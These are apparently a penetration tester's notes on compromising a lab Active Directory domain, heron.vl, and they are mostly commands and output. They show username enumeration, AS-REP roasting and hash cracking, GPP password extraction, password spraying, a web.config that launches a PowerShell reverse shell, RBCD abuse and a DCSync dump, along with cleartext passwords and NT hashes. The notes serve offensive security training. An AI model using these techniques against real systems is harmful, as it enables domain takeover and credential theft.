Heron (Chain)

This is not a writeup, just my notes about the machine.

Machine information

Operating System:

Chain: False (standalone compromise)pent

Credentials

Username	Password	Method	Scope
pentest	Heron123!	Provided by customer	Initial tester user
samuel.davies	l6fkiy9oN	Asreproast	Domain User
svc-web-accounting-d	H3r0n2024#!	Groups XML + Password Spraying	Domain User
_local	Deplete5DenialDealt	Password Spraying Attack	Domain User
Julian.Pratt	Deplete5DenialDealt	Re use Credentials	Domain User
adm_prju	ayDMWV929N9wAiB4	Retrieved in .ink files	Domain User

✅ Valid Usernames

amanda.williams
steven.thomas
vanessa.anderson
danielle.harrison
adam.harper
adam.matthews
wayne.wood
alice.hill
jane.richards
anthony.goodwin
jayne.johnson
katherine.howard
samuel.davies
Guest
krbtgt
Katherine.Howard
Rachael.Boyle
Anthony.Goodwin
Carol.John
Rosie.Evans
Adam.Harper
Adam.Matthews
Steven.Thomas
Amanda.Williams
Vanessa.Anderson
Jane.Richards
Rhys.George
Mohammed.Parry
Julian.Pratt
Wayne.Wood
Danielle.Harrison
Samuel.Davies
Alice.Hill
Jayne.Johnson
Geraldine.Powell
adm_hoka
adm_prju
svc-web-accounting
svc-web-accounting-d

🔑 Passwords list

l6fkiy9oN

Information Gathering

Nmap

Nmap scan report for 10.10.231.37
PORT      STATE SERVICE       REASON
53/tcp    open  domain        syn-ack
80/tcp    open  http          syn-ack
88/tcp    open  kerberos      syn-ack
135/tcp   open  epmap         syn-ack
139/tcp   open  netbios-ssn   syn-ack
389/tcp   open  ldap          syn-ack
445/tcp   open  microsoft-ds  syn-ack
464/tcp   open  kpasswd       syn-ack
593/tcp   open  unknown       syn-ack
636/tcp   open  ldaps         syn-ack
3268/tcp  open  unknown       syn-ack
3269/tcp  open  unknown       syn-ack
3389/tcp  open  ms-wbt-server syn-ack
9389/tcp  open  unknown       syn-ack
49664/tcp open  unknown       syn-ack
49667/tcp open  unknown       syn-ack
49669/tcp open  unknown       syn-ack
58818/tcp open  unknown       syn-ack
58838/tcp open  unknown       syn-ack
62422/tcp open  unknown       syn-ack
62440/tcp open  unknown       syn-ack
62483/tcp open  unknown       syn-ack

Service Enumeration

10.10.231.37

SMB (enum4linux-ng)

• Root/parent Domain

• Domain SID: S-1-5-21-1568358163-2901064146-3316491674

• Domain: heron.vl

• FQDN: mucdc.heron.vl

• NetBIOS: HERON

• SMB Signing: True

• Server Allows Null session authentication

HTTP:80

Initial foothold on Heron

Setting up a tunnel to reach the internal network

❯ sudo sshuttle -r pentest@10.10.231.38 10.10.231.37 -v

Discovering Valid users via Kerbrute user enumeration

❯ /opt/kerbrute/kerbrute userenum -d heron.vl --dc 10.10.231.37 /opt/statistically-likely-usernames/john.smith.txt  -t 65

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: dev (n/a) - 04/24/25 - Ronnie Flathers @ropnop

2025/04/24 14:43:50 >  Using KDC(s):
2025/04/24 14:43:50 >  	10.10.231.37:88

2025/04/24 14:43:52 >  [+] VALID USERNAME:	amanda.williams@heron.vl
2025/04/24 14:44:00 >  [+] VALID USERNAME:	steven.thomas@heron.vl
2025/04/24 14:45:03 >  [+] VALID USERNAME:	vanessa.anderson@heron.vl
2025/04/24 14:45:53 >  [+] VALID USERNAME:	danielle.harrison@heron.vl
2025/04/24 14:46:26 >  [+] VALID USERNAME:	adam.harper@heron.vl
2025/04/24 14:46:28 >  [+] VALID USERNAME:	adam.matthews@heron.vl
2025/04/24 14:47:08 >  [+] VALID USERNAME:	wayne.wood@heron.vl
2025/04/24 14:48:50 >  [+] VALID USERNAME:	alice.hill@heron.vl
2025/04/24 14:49:25 >  [+] VALID USERNAME:	jane.richards@heron.vl
2025/04/24 14:50:46 >  [+] VALID USERNAME:	anthony.goodwin@heron.vl
2025/04/24 14:50:51 >  [+] VALID USERNAME:	jayne.johnson@heron.vl
2025/04/24 14:51:05 >  [+] VALID USERNAME:	katherine.howard@heron.vl
2025/04/24 14:55:31 >  Done! Tested 248231 usernames (12 valid) in 700.655 seconds

Discoverign Asreproastable user

❯ impacket-GetNPUsers heron.vl/ -no-pass -usersfile users.txt -dc-ip 10.10.231.37 2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[-] User amanda.williams doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User steven.thomas doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User vanessa.anderson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User danielle.harrison doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User adam.harper doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User adam.matthews doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User wayne.wood doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User alice.hill doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User jane.richards doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User anthony.goodwin doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User jayne.johnson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User katherine.howard doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$samuel.davies@HERON.VL:94d6c72b09d88f048c03de3309854f35$2d81f9c444f4761938f0cfa79d919dc974e2207eef980b0c2f39d073f16d0661a44f42bf85341630d959c8812ca7ee78de70bfc65d936591eefb22e28775cc4f73e4bd44197c511057954ad104cda16b92a30ea0d21a8ddaf381a6ae40f10237c1143b3c653587a3a9113f28b892d4451be2ba419c337d02e7d466b02ba150f72a5bda435424e3fe43341e035b7c6ac84da7d830dec39a44346bf9c5be905760a33bc6459cedd65e58e9ab4c0ebc230d5b4ecb530870b2033c04645a3ea1b034368a9e21f6bb78965699db9e61c9a0ba6a057191b5bc69d04014f4700ed6c4a77729868e

Cracking samuel.davies' hash

❯ hashcat -a 0 -m 18200 samuel.davies.asreproast /usr/share/wordlists/rockyou.txt

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

$krb5asrep$23$samuel.davies@HERON.VL:94d6c72b09d88f048c03de3309854f35$2d81f9c444f4761938f0cfa79d919dc974e2207eef980b0c2f39d073f16d0661a44f42bf85341630d959c8812ca7ee78de70bfc65d936591eefb22e28775cc4f73e4bd44197c511057954ad104cda16b92a30ea0d21a8ddaf381a6ae40f10237c1143b3c653587a3a9113f28b892d4451be2ba419c337d02e7d466b02ba150f72a5bda435424e3fe43341e035b7c6ac84da7d830dec39a44346bf9c5be905760a33bc6459cedd65e58e9ab4c0ebc230d5b4ecb530870b2033c04645a3ea1b034368a9e21f6bb78965699db9e61c9a0ba6a057191b5bc69d04014f4700ed6c4a77729868e:l6fkiy9oN

Discovering groups.xml within the sysvol share

❯ nxc smb 10.10.231.37  -u samuel.davies -p 'l6fkiy9oN' --shares -M spider_plus

File: 10.10.231.37.json
----------------------------------
       "heron.vl/Policies/{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}/Machine/Preferences/Groups/Groups.xml": {
            "atime_epoch": "2024-06-04 12:01:07",
            "ctime_epoch": "2024-06-04 11:59:44",
            "mtime_epoch": "2024-06-04 12:01:07",
            "size": "1.11 KB"
        },

Extracting the GPP Password using NetExec

❯ nxc smb 10.10.231.37  -u samuel.davies -p 'l6fkiy9oN' -M gpp_password
<SNIF>
GPP_PASS... 10.10.231.37    445    MUCDC            [*] Found heron.vl/Policies/{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}/Machine/Preferences/Groups/Groups.xml
GPP_PASS... 10.10.231.37    445    MUCDC            [+] Found credentials in heron.vl/Policies/{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}/Machine/Preferences/Groups/Groups.xml
GPP_PASS... 10.10.231.37    445    MUCDC            Password: H3r0n2024#!
GPP_PASS... 10.10.231.37    445    MUCDC            action: U
GPP_PASS... 10.10.231.37    445    MUCDC            newName: _local
GPP_PASS... 10.10.231.37    445    MUCDC            fullName: 
GPP_PASS... 10.10.231.37    445    MUCDC            description: local administrator
GPP_PASS... 10.10.231.37    445    MUCDC            changeLogon: 0
GPP_PASS... 10.10.231.37    445    MUCDC            noChange: 0
GPP_PASS... 10.10.231.37    445    MUCDC            neverExpires: 1
GPP_PASS... 10.10.231.37    445    MUCDC            acctDisabled: 0
GPP_PASS... 10.10.231.37    445    MUCDC            subAuthority: RID_ADMIN
GPP_PASS... 10.10.231.37    445    MUCDC            userName: Administrator (built-in)

Password Spraying attack

❯ nxc smb 10.10.231.37 -u users.txt -p 'H3r0n2024#!'
SMB         10.10.231.37    445    MUCDC            [+] heron.vl\svc-web-accounting-d:H3r0n2024#!

Remote command Execution via web.config

The tester discovered the user svc-web-accounting-d possesses Read and Write permission over Accounting$ share that is hosting the web configuration including web.config and revealed the presence of a new subdomain named accounting.

❯ smbclient '\\10.10.231.37\accounting$' -U 'svc-web-accounting-d%H3r0n2024#!'
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Apr 24 15:40:06 2025
  ..                                DHS        0  Sun Jun  2 11:26:14 2024
  AccountingApp.deps.json             A    37407  Sun Jun  2 15:25:26 2024
  AccountingApp.dll                   A    89600  Sun Jun  2 15:25:26 2024
  AccountingApp.exe                   A   140800  Sun Jun  2 15:25:26 2024
  AccountingApp.pdb                   A    39488  Sun Jun  2 15:25:26 2024
  AccountingApp.runtimeconfig.json      A      557  Sat Jun  1 18:22:20 2024
  appsettings.Development.json        A      127  Sat Jun  1 18:00:54 2024
  appsettings.json                    A      237  Sat Jun  1 18:03:50 2024
  FinanceApp.db                       A   106496  Sat Jun  1 10:09:00 2024
  Microsoft.AspNetCore.Authentication.Negotiate.dll      A    53920  Wed Nov  1 05:08:26 2023
  Microsoft.AspNetCore.Cryptography.Internal.dll      A    52912  Mon May 20 08:23:52 2024
  Microsoft.AspNetCore.Cryptography.KeyDerivation.dll      A    23712  Mon May 20 08:23:56 2024
  Microsoft.AspNetCore.Identity.EntityFrameworkCore.dll      A   108808  Mon May 20 08:24:24 2024
  Microsoft.Data.Sqlite.dll           A   172992  Mon May 20 03:54:40 2024
  Microsoft.EntityFrameworkCore.Abstractions.dll      A    34848  Mon May 20 03:54:30 2024
  Microsoft.EntityFrameworkCore.dll      A  2533312  Mon May 20 03:55:04 2024
  Microsoft.EntityFrameworkCore.Relational.dll      A  1991616  Mon May 20 03:55:20 2024
  Microsoft.EntityFrameworkCore.Sqlite.dll      A   257456  Mon May 20 03:55:30 2024
  Microsoft.Extensions.DependencyModel.dll      A    79624  Tue Oct 31 18:59:24 2023
  Microsoft.Extensions.Identity.Core.dll      A   177840  Mon May 20 08:24:10 2024
  Microsoft.Extensions.Identity.Stores.dll      A    45232  Mon May 20 08:24:20 2024
  Microsoft.Extensions.Options.dll      A    64776  Thu Jan 18 06:05:26 2024
  runtimes                            D        0  Sat Jun  1 10:51:32 2024
  SQLitePCLRaw.batteries_v2.dll       A     5120  Wed Aug 23 22:41:24 2023
  SQLitePCLRaw.core.dll               A    50688  Wed Aug 23 22:38:38 2023
  SQLitePCLRaw.provider.e_sqlite3.dll      A    35840  Wed Aug 23 22:38:52 2023
  System.DirectoryServices.Protocols.dll      A    71944  Tue Oct 31 19:00:24 2023
  web.config                          A      554  Thu Jun  6 10:41:39 2024
  wwwroot                             D        0  Sat Jun  1 10:51:32 2024

		6261499 blocks of size 4096. 1961394 blocks available
smb: \> 

The tester proceeded to upload a web.config as follows:

<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <location path="." inheritInChildApplications="false">
    <system.webServer>
      <handlers>
        <add name="aspNetCore" path="execute.now" verb="*" modules="AspNetCoreModuleV2" resourceType="Unspecified" />
      </handlers>
      <aspNetCore processPath="powershell" arguments="-e HOAXSHELL/REVSHELL" hostingModel="OutOfProcess" />
    </system.webServer>
  </location>
</configuration>
<!--ProjectGuid: 803424B4-7DFD-4F1E-89C7-4AAC782C27C4-->

And finally, trigger the execution of the reverse shell.

❯ curl http://accounting.heron.vl/execute.now

Discovering _local user credentials

Performing Password Spraying attack

The tester proceeded to perform a password spraying attack using the previously found password, as the account appeared to be a service account, suggesting that some users may have the bad practice of reusing credentials.

 nxc smb 10.10.231.37 -u users.txt -p 'Deplete5DenialDealt' 
SMB         10.10.231.37    445    MUCDC            [+] heron.vl\Julian.Pratt:Deplete5DenialDealt 

Discovering adm_prju user credentials

During the home directory enumeration the tester discovered that the user Julian.Pratt had a shortcuts files.

❯ smbclient '\\10.10.231.37\home$' -U 'Julian.Pratt%Deplete5DenialDealt'
Try "help" to get a list of possible commands.
smb: \> cd Julian.Pratt
smb: \Julian.Pratt\> dir
  .                                   D        0  Sun Jun  2 06:47:14 2024
  ..                                  D        0  Sat Jun  1 11:10:46 2024
  frajmp.lnk                          A     1443  Sun Jun  2 06:47:47 2024
  Is there a way to -auto login- in PuTTY with a password- - Super User.url      A      117  Sat Jun  1 11:44:44 2024
  Microsoft Edge.lnk                  A     2312  Sat Jun  1 11:44:38 2024
  mucjmp.lnk                          A     1441  Sun Jun  2 06:47:33 2024

		6261499 blocks of size 4096. 1959823 blocks available
smb: \Julian.Pratt\> get frajmp.lnk
getting file \Julian.Pratt\frajmp.lnk of size 1443 as frajmp.lnk (2.2 KiloBytes/sec) (average 2.2 KiloBytes/sec)
smb: \Julian.Pratt\> get mucjmp.lnk
getting file \Julian.Pratt\mucjmp.lnk of size 1441 as mucjmp.lnk (2.2 KiloBytes/sec) (average 2.2 KiloBytes/sec)
smb: \Julian.Pratt\>

The files was analyzed revealing the adm_prju's password.

❯ cat mucjmp.lnk
C:\Program Files\PuTTY\putty.exe..\..\Program Files\PuTTY\putty.exeC:\Program Files\PuTTY$adm_prju@mucjmp -pw ayDMWV929N9wAiB4

Compromising FRAJMP Host

Privilege escalation to root

pentest@frajmp:~$ su _local
Password: 
_local@frajmp:/home/pentest$ sudo -l
[sudo] password for _local: 
Matching Defaults entries for _local on localhost:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User _local may run the following commands on localhost:
    (ALL : ALL) ALL
_local@frajmp:/home/pentest$ sudo su
root@frajmp:/home/pentest# 

Obtaining the NT Hash FRAJMP computer account

oot@frajmp:/home/pentest# python3 keytabextract.py  /etc/krb5.keytab
[*] RC4-HMAC Encryption detected. Will attempt to extract NTLM hash.
[*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction.
[*] AES128-CTS-HMAC-SHA1 hash discovered. Will attempt hash extraction.
[+] Keytab File successfully imported.
	REALM : HERON.VL
	SERVICE PRINCIPAL : FRAJMP$/
	NTLM HASH : 6f55b3b443ef192c804b2ae98e8254f7
	AES-256 HASH : 7be44e62e24ba5f4a5024c185ade0cd3056b600bb9c69f11da3050dd586130e7
	AES-128 HASH : dcaaea0cdc4475eee9bf78e6a6cbd0cd
root@frajmp:/home/pentest# 

Compromising Domain Controller (Heron.vl)

During enumeration, the tester identified that the user ADM_PRJU@HERON.VL is a member of the group ADMINS_T1@HERON.VL, which has WriteAccountRestrictions privileges over the machine account MUCDC.HERON.VL.

This privilege enables the abuse of Resource-Based Constrained Delegation (RBCD) by modifying the msDS-AllowedToActOnBehalfOfOtherIdentity attribute. As a result, the tester successfully granted delegation rights to the computer account FRAJMP$, impersonated the MUCDC$ computer account, and compromised the domain controller via a DCSync attack.

Abusing RBCD to compromise domain controller

❯ impacket-rbcd -delegate-from 'FRAJMP$' -delegate-to 'MUCDC$' -action 'write' 'HERON.vl/adm_prju:ayDMWV929N9wAiB4'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] FRAJMP$ can now impersonate users on MUCDC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     FRAJMP$      (S-1-5-21-1568358163-2901064146-3316491674-27101)

Requesting TGT using S4U for MUCDC$

 impacket-getST -spn 'cifs/mucdc.heron.vl' -impersonate 'MUCDC$' 'heron.vl/FRAJMP$' -hashes :6f55b3b443ef192c804b2ae98e8254f7 2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating MUCDC$
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in MUCDC$@cifs_mucdc.heron.vl@HERON.VL.ccache

Performing DCSync Attack

❯ KRB5CCNAME='MUCDC$@cifs_mucdc.heron.vl@HERON.VL.ccache' impacket-secretsdump -k -no-pass mucdc.heron.vl -just-dc
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
_admin:500:aad3b435b51404eeaad3b435b51404ee:3998cdd28f164fa95983caf1ec603938:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9c586ab9529b5a6445e501b2208403f2:::
heron.vl\Katherine.Howard:24575:aad3b435b51404eeaad3b435b51404ee:6548c4cf2aac7a7d1b02d62b2e1a03d2:::
heron.vl\Rachael.Boyle:24576:aad3b435b51404eeaad3b435b51404ee:9dbe3e4834072d582e8d93c892348e6a:::
heron.vl\Anthony.Goodwin:24577:aad3b435b51404eeaad3b435b51404ee:b87a22f9ae78745edaf7070389e10bac:::
heron.vl\Carol.John:24578:aad3b435b51404eeaad3b435b51404ee:46b1a4375e32c380a6dcf38a8bb7fb74:::
heron.vl\Rosie.Evans:24579:aad3b435b51404eeaad3b435b51404ee:6e59150f19d36b11c49d060249e908ad:::
heron.vl\Adam.Harper:24580:aad3b435b51404eeaad3b435b51404ee:a5468ccbf390bba74aaf5554f3d3555e:::
heron.vl\Adam.Matthews:24581:aad3b435b51404eeaad3b435b51404ee:fa460c769bf2327c61e535787476e6a3:::
heron.vl\Steven.Thomas:24582:aad3b435b51404eeaad3b435b51404ee:dd635bb1378d97b947b84f40886e9e64:::
heron.vl\Amanda.Williams:24583:aad3b435b51404eeaad3b435b51404ee:6d33e1c539d3abe7fbfc15b09f1e94a5:::
heron.vl\Vanessa.Anderson:24584:aad3b435b51404eeaad3b435b51404ee:d8b0393689f523f02daa715a9f49083e:::
heron.vl\Jane.Richards:24585:aad3b435b51404eeaad3b435b51404ee:550f678b1a5b5bbe263860e4e6136910:::
heron.vl\Rhys.George:24586:aad3b435b51404eeaad3b435b51404ee:2718fc2f944887ed9511d934e0249234:::
heron.vl\Mohammed.Parry:24587:aad3b435b51404eeaad3b435b51404ee:01e7bba60d0469ea860ee8dfc83f5d80:::
heron.vl\Julian.Pratt:24588:aad3b435b51404eeaad3b435b51404ee:5bb0b312fa6a1bd0b89b179e3e6f1288:::
heron.vl\Wayne.Wood:24589:aad3b435b51404eeaad3b435b51404ee:7a2320fceec0c816bb48190ec143a2bb:::
heron.vl\Danielle.Harrison:24590:aad3b435b51404eeaad3b435b51404ee:558ca476742a54e6f2d469ac4d1abadf:::
heron.vl\Samuel.Davies:24591:aad3b435b51404eeaad3b435b51404ee:4a976cc04f49221cf1d950132f84ed2c:::
heron.vl\Alice.Hill:24592:aad3b435b51404eeaad3b435b51404ee:c62c0e85ad1e975b14181f65bfff7257:::
heron.vl\Jayne.Johnson:24593:aad3b435b51404eeaad3b435b51404ee:273b684425d847c07b05391a9f35f2ef:::
heron.vl\Geraldine.Powell:24594:aad3b435b51404eeaad3b435b51404ee:5003da60cacbbc1ba80df96d7af1e7e8:::
heron.vl\adm_hoka:24595:aad3b435b51404eeaad3b435b51404ee:4bb9e0417af7f8adedd01382f1453b38:::
heron.vl\adm_prju:24596:aad3b435b51404eeaad3b435b51404ee:80ae9e479b40971bc9cac183651dad05:::
heron.vl\svc-web-accounting:24602:aad3b435b51404eeaad3b435b51404ee:f9113ad2e51cee72034043daa948d5de:::
heron.vl\svc-web-accounting-d:26101:aad3b435b51404eeaad3b435b51404ee:bf95ac22b6d87880f9eb3dfdf3d416f9:::
MUCDC$:1000:aad3b435b51404eeaad3b435b51404ee:c866bc764b6b7e70dd02f0f513d1aae3:::
MUCJMP$:24598:aad3b435b51404eeaad3b435b51404ee:ed656b46276f52cb5dae4ecdf0acd26c:::
ACCOUNTING-STAG$:26601:aad3b435b51404eeaad3b435b51404ee:7342a72fc3c418edeb9f98497c3857d4:::
ACCOUNTING-PREP$:26602:aad3b435b51404eeaad3b435b51404ee:7d9fb2f2bbf68b7d8dd52414bca20540:::
FRAJMP$:27101:aad3b435b51404eeaad3b435b51404ee:6f55b3b443ef192c804b2ae98e8254f7:::